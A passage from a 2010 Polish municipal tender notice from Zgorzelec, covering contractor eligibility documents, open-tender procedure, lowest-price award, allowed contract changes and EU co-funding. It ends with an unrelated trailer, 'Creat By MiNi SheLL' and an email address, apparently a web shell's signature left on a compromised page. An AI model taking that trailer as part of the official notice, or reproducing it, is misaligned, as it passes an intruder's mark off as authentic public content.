<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 
-  Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Wypełniony i podpisany formularz ofertowy
2.  Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych
3. Formularz wskazujący którą część zamówienia Wykonawca powierzy do realizacji 
Podwykonawcy.  
(Wykonawca który zamierza samodzielnie wykonać zamówienie nie składa wraz z oferta przedmiotowego formularza. W przypadku kiedy Wykonawca będzie korzystał z wiedzy i doświadczenia innych podmiotów, a nie załączy przedmiotowego formularza do oferty, Zamawiający nie będzie mógł uznać spełnienia przez Wykonawcę warunku posiadania wiedzy i doświadczenia.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami art. 144 ust. 1 ustawy Prawo Zamówień Publicznych, Zamawiający przewiduje możliwość dokonania zmiany istotnych postanowień zawartej umowy, przy czym zakres tych zmian definiuje on  następująco:
-  Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za realizacje umowy, możliwa będzie w każdym czasie w trakcie związania umową, pod warunkiem że uprawnienia osób wskazywanych zamiast wskazanych pierwotnie będą co najmniej takie same jak osób wskazanych pierwotnie. 
W sytuacji zaistnienia uzasadnionych okoliczności powodujących konieczność takiej 
zmiany, Wykonawca zgłosi ten fakt Zamawiającemu pisemnie wraz z uzasadnieniem.
-  Przesunięcie terminu wykonania zamówienia możliwe będzie  w  przypadku
wystąpienia opóźnień w procedurze wyboru Wykonawcy robót budowlanych
-   Przesunięcie terminu wykonania zamówienia możliwe będzie  w  przypadku
wystąpienia opóźnień podczas realizacji nadzorowanych robót budowlanych,  niezależnie czy opóźnienie to zawinione zostało przez Zamawiającego czy też przez Wykonawcę nadzorowanych robót budowlanych. W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno minimum tyle dni ile wynosi przesunięcie terminu realizacji nadzorowanych robót budowlanych.
-    Przesunięcie terminu wykonania zamówienia możliwe będzie z przyczyn losowych, 
w przypadku wystąpienia działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonywania nadzorowanych robót budowlanych. W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno minimum tyle dni ile wynosi przesunięcie terminu realizacji nadzorowanych robót budowlanych.
-   Przesunięcie terminu wykonania zamówienia możliwe będzie w przypadku wystąpienia robót dodatkowych do nadzorowanych robót budowlanych, a których wykonanie nie będzie  możliwe wraz z nadzorowanymi robotami budowlanymi w terminie umownym przewidzianym dla tych robót. 
-   Przesunięcie terminu wykonania zamówienia możliwe będzie w przypadku wstrzymania nadzorowanych robót przez uprawnione do tego organy. W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno minimum tyle dni ile wynosi przesunięcie terminu realizacji nadzorowanych robót budowlanych w związku z wstrzymaniem tych robót.
-   Zmiana podwykonawcy możliwa będzie jedynie wtedy jeżeli zakres realizowanych przez podwykonawcę usług, nie ulegnie zmianie w stosunku do zakresu usług wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez podwykonawcę.
Zmiana taka możliwa będzie jedynie na uzasadniony wniosek Wykonawcy, do którego 
winien załączyć on  projekt umowy z podwykonawcą, przy czym wymagana jest w tym wypadku pisemna zgoda Zamawiającego na zawarcie przez Wykonawcę umowy z innym podwykonawcą
Strona ubiegająca się o zmianę umowy, winna zwrócić się do Wykonawcy lub Zamawiającego, z pisemnym wnioskiem o zmianę umowy podając równocześnie uzasadnienie i podstawę takiej  zmiany. Strony ustalają termin 7 dniowy, licząc od dnia w którym zaistniały przesłanki do wprowadzenia takiej zmiany, na przekazanie w/w wniosku do Wykonawcy lub Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 59-900 Zgorzelec, ul. Domańskiego 7 
Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2010 godzina 13:00, miejsce: 59-900 Zgorzelec, ul. Domańskiego 7, Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2007 - 2013, w ramach Programu Operacyjnego 9- Miasta Działanie 9.1. - Miasta powyżej 10.000 mieszkańców..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com